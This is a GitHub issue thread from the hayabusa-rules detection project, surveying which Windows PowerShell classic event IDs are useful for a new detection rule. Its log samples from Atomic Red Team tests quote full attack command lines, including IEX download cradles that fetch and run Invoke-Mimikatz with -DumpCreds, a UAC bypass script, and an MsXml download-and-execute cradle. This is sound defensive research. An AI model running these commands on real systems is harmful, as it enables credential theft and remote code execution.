### ISSUE TITLE
Investigation about  EventID in `Windows PowerShell.evtx` EventID:`400`/`600`/`800` ... etc

### ISSUE THREAD

**Issue by fukusuket** [Yamato-Security/hayabusa-rules#512]
Hayabusa currently outputs PowerShell execution history using the following rules.

#### `Microsoft-Windows-PowerShell/Operational.evtx` EventID:`4103`/`4104`  related rules.
- [hayabusa/builtin/PowerShell_Op/PwSh_4103_Info_PipelineExecution.yml](https://github.com/Yamato-Security/hayabusa-rules/blob/main/hayabusa/builtin/PowerShell_Op/PwSh_4103_Info_PipelineExecution.yml)
- [hayabusa/builtin/PowerShell_Op/PwSh_4104_Info_ScriptblockLog.yml](https://github.com/Yamato-Security/hayabusa-rules/blob/main/hayabusa/builtin/PowerShell_Op/PwSh_4104_Info_ScriptblockLog.yml)
- [hayabusa/builtin/PowerShell_Op/PwSh_4104_Med_ScriptblockLog_PotentiallyMalicious.yml](https://github.com/Yamato-Security/hayabusa-rules/blob/main/hayabusa/builtin/PowerShell_Op/PwSh_4104_Med_ScriptblockLog_PotentiallyMalicious.yml)
- [sigma/builtin/powershell/powershell_script](https://github.com/Yamato-Security/hayabusa-rules/tree/main/sigma/builtin/powershell/powershell_script)
- [sigma/builtin/powershell/powershell_module](https://github.com/Yamato-Security/hayabusa-rules/tree/main/sigma/builtin/powershell/powershell_module)

#### `Windows PowerShell.evtx` EventID:`400`/`600`/`800`  related rules.
- [hayabusa/builtin/PowerShellClassic/PwShClassic_400_Med_PwShStarted_V2DowngradeAttack.yml](https://github.com/Yamato-Security/hayabusa-rules/blob/main/hayabusa/builtin/PowerShellClassic/PwShClassic_400_Med_PwShStarted_V2DowngradeAttack.yml)
- [sigma/builtin/powershell/powershell_classic](https://github.com/Yamato-Security/hayabusa-rules/tree/main/sigma/builtin/powershell/powershell_classic)

Logs are output frequently to `Microsoft-Windows-PowerShell/Operational.evtx`, there are cases where the logs are rotated with the default settings. On the other hand, `Windows PowerShell.evtx` logs are recorded less frequently, so there are cases where logs are stored for a longer period of time, this increases the possibility of finding IoCs.

Investigate EventID and fields useful for detection in `Windows PowerShell.evtx`

**Comment by fukusuket** [comment]
memo:
https://redcanary.com/threat-detection-report/techniques/powershell/
https://atomicredteam.io/execution/T1059.001/
https://redcanary.com/blog/threat-detection-series-powershell/

**Comment by fukusuket** [comment]
**Just start Windows Terminal (does not execute any commands)**

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=10915433-372b-4edd-a01f-bfab79268e1b HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.22621.2428 RunspaceId=dbe5fe58-ddad-4a48-bc63-3261186635c8 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |0|-|-|-|
|600 |6|〇|-|`Data: ProviderName=Registry NewProviderState=Started SequenceNumber=1 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=10915433-372b-4edd-a01f-bfab79268e1b HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Registry ¦ Data: Started`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|0|-|-|-|

**Comment by fukusuket** [comment]
**Start Windows Terminal (does not execute any commands)**

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=10915433-372b-4edd-a01f-bfab79268e1b HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.22621.2428 RunspaceId=dbe5fe58-ddad-4a48-bc63-3261186635c8 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |0|-|-|-|
|600 |6|〇|-|`Data: ProviderName=Registry NewProviderState=Started SequenceNumber=1 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=10915433-372b-4edd-a01f-bfab79268e1b HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Registry ¦ Data: Started`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|0|-|-|-|

**Comment by fukusuket** [comment]
## Environment
- Windows 11 Home edition(Locale: Japanese)
- All event log settings are default values

## PowerShell Classic event log Survey summary
|EventID|Evaluation|Comment|
|--|--|--|
|400 |〇| Useful information is recorded. However, the log output just by starting Terminal is noise, so it is better to exclude it.|
|403 |-| Information that overlaps with EID400 |
|600 |×| Too noisy. Information that overlaps with EID400|
|800 |×| Nothing was output |

**Comment by fukusuket** [comment]
## Environment
- Windows 11 Home edition(Locale: Japanese)
- All event log settings are default values

## PowerShell Classic event log survey summary
|EventID|Evaluation|Comment|
|--|--|--|
|400 |〇| Useful information is recorded. However, the log output just by starting Terminal is noise, so it is better to exclude it.|
|403 |-| Information that overlaps with EID400 |
|600 |×| Too noisy. Information that overlaps with EID400|
|800 |×| Nothing was output |

**Comment by fukusuket** [comment]
@YamatoSecurity 
Based on the above survey results, I think it would be good to have one rule with the following conditions. What do you think?
- Level: Informational
- Channel: Windows PowerShell
- EID: 400
- Exclude https://github.com/Yamato-Security/hayabusa-rules/issues/512#issuecomment-1793683201.

**Comment by fukusuket** [comment]
[Atomic Test #1 - Mimikatz](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-1---mimikatz)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=ba8b0c5b-35ca-4fa4-88ab-3a3554a39a23 HostApplication=powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds EngineVersion=5.1.22621.2428 RunspaceId=1519d6b5-c66e-49ad-a257-bc7cb62e47c8 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=ba8b0c5b-35ca-4fa4-88ab-3a3554a39a23 HostApplication=powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds EngineVersion=5.1.22621.2428 RunspaceId=1519d6b5-c66e-49ad-a257-bc7cb62e47c8 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Stopped`|
|600 |6|〇|-|`Data: ProviderName=Variable NewProviderState=Started SequenceNumber=11 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=ba8b0c5b-35ca-4fa4-88ab-3a3554a39a23 HostApplication=powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Started ¦ Data: Variable`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|281|-|〇|`ScriptBlock: function Invoke-Mimikatz ...`|

**Comment by fukusuket** [comment]
[Atomic Test #4 - Obfuscation Tests](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-4---obfuscation-tests)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |0|-|-|-|
|403 |0|-|-|-|
|600 |0|-|-|-|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|1|-|〇|`ScriptBlock: Set-Variable ...`|

**Comment by fukusuket** [comment]
[Atomic Test #6 - Invoke-AppPathBypass](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-6---invoke-apppathbypass)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=ed612daf-5fb4-4b88-bdfe-50a0bdabb1be HostApplication=Powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe' EngineVersion=5.1.22621.2428 RunspaceId=c323259c-e616-4251-943f-b372e14b19e9 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=ed612daf-5fb4-4b88-bdfe-50a0bdabb1be HostApplication=Powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe' EngineVersion=5.1.22621.2428 RunspaceId=c323259c-e616-4251-943f-b372e14b19e9 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Stopped`|
|600 |6|〇|-|`Data: ProviderName=Registry NewProviderState=Started SequenceNumber=1 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=ed612daf-5fb4-4b88-bdfe-50a0bdabb1be HostApplication=Powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe' EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Registry ¦ Data: Started`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|1|-|〇|`...`|

**Comment by fukusuket** [comment]
[Atomic Test #7 - Powershell MsXml COM object - with prompt](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=6827d386-7045-4a9a-81e2-8cf1437a3422 HostApplication=powershell.exe -exec bypass -noprofile $comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText EngineVersion=5.1.22621.2428 RunspaceId=ff7f12db-807d-4d75-bfd6-7e8a1f7171da PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=6827d386-7045-4a9a-81e2-8cf1437a3422 HostApplication=powershell.exe -exec bypass -noprofile $comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText EngineVersion=5.1.22621.2428 RunspaceId=ff7f12db-807d-4d75-bfd6-7e8a1f7171da PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Stopped`|
|600 |6|〇|-|`Data: ProviderName=Variable NewProviderState=Started SequenceNumber=11 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=6827d386-7045-4a9a-81e2-8cf1437a3422 HostApplication=powershell.exe -exec bypass -noprofile $comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Started ¦ Data: Variable`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|0|-|-|-|

**Comment by fukusuket** [comment]
[Atomic Test #9 - Powershell invoke mshta.exe download](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-9---powershell-invoke-mshtaexe-download)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=6cd2d1bb-0622-4dba-a497-c15699e8525e HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c write-host -ForegroundColor Cyan $(Get-Date -Format s) 'Download Cradle test success!';Read-Host -Prompt 'Press Enter to continue' EngineVersion=5.1.22621.2428 RunspaceId=9812211d-b578-4696-b7c5-8fe47340f99a PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=6cd2d1bb-0622-4dba-a497-c15699e8525e HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c write-host -ForegroundColor Cyan $(Get-Date -Format s) 'Download Cradle test success!';Read-Host -Prompt 'Press Enter to continue' EngineVersion=5.1.22621.2428 RunspaceId=9812211d-b578-4696-b7c5-8fe47340f99a PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Stopped`|
|600 |6|1|〇|-|`Data: ProviderName=Registry NewProviderState=Started SequenceNumber=1 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=6cd2d1bb-0622-4dba-a497-c15699e8525e HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c write-host -ForegroundColor Cyan $(Get-Date -Format s) 'Download Cradle test success!';Read-Host -Prompt 'Press Enter to continue' EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Registry ¦ Data: Started`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|0|-|-|-|

**Comment by fukusuket** [comment]
[Atomic Test #19 - PowerShell Command Execution](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md#atomic-test-19---powershell-command-execution)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=9ebdb8f8-6b83-4c59-9feb-26d328e672c6 HostApplication=powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== EngineVersion=5.1.22621.2428 RunspaceId=7d3539b2-f65b-4ee5-a8c4-7d6df77fd25a PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=9ebdb8f8-6b83-4c59-9feb-26d328e672c6 HostApplication=powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== EngineVersion=5.1.22621.2428 RunspaceId=7d3539b2-f65b-4ee5-a8c4-7d6df77fd25a PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Stopped`|
|600 |6|〇|-|`Data: ProviderName=Variable NewProviderState=Started SequenceNumber=11 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=9ebdb8f8-6b83-4c59-9feb-26d328e672c6 HostApplication=powershell.exe -e JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Started ¦ Data: Variable`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|0|-|-|-|

**Comment by fukusuket** [comment]
[WELA](https://github.com/Yamato-Security/WELA/)

|EventID|Count|CommandLine|Script|SampleLog|
|--|--|--|--|--|
|400 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=4ee25161-fc4e-42e7-b47d-df5111623c23 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -command .\WELA.ps1 -LiveAnalysis -SecurityAuthenticationSummary EngineVersion=5.1.22621.2428 RunspaceId=683f86dc-e907-4a37-a2a0-099c4d74d8b3 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: None`|
|403 |1|〇|-|`Data: Available ¦ Data: NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=18 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=4ee25161-fc4e-42e7-b47d-df5111623c23 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -command .\WELA.ps1 -LiveAnalysis -SecurityAuthenticationSummary EngineVersion=5.1.22621.2428 RunspaceId=683f86dc-e907-4a37-a2a0-099c4d74d8b3 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Stopped`|
|600 |6|〇|-|`Data: ProviderName=Registry NewProviderState=Started SequenceNumber=1 HostName=ConsoleHost HostVersion=5.1.22621.2428 HostId=4ee25161-fc4e-42e7-b47d-df5111623c23 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -command .\WELA.ps1 -LiveAnalysis -SecurityAuthenticationSummary EngineVersion= RunspaceId= PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= ¦ Data: Registry ¦ Data: Started`|
|800 |0|-|-|-|
|4103|0|-|-|-|
|4104|4|-|〇|`ScriptBlock: <# .SYNOPSIS WELA (Windows Event Log Analyzer) is the Swiss Army knife for Windows event logs fast forensics. WELA (Windows Event Log...`|

**Comment by YamatoSecurity** [comment]
@fukusuket Thanks so much for looking into this. That sounds good to me! Do you want to make a rule and I will check it over for FPs, etc..?

**Comment by fukusuket** [comment]
Thank you so much for checking :) Yes, I would love to create rule!💪

**Comment by YamatoSecurity** [comment]
closed by https://github.com/Yamato-Security/hayabusa-rules/pull/524
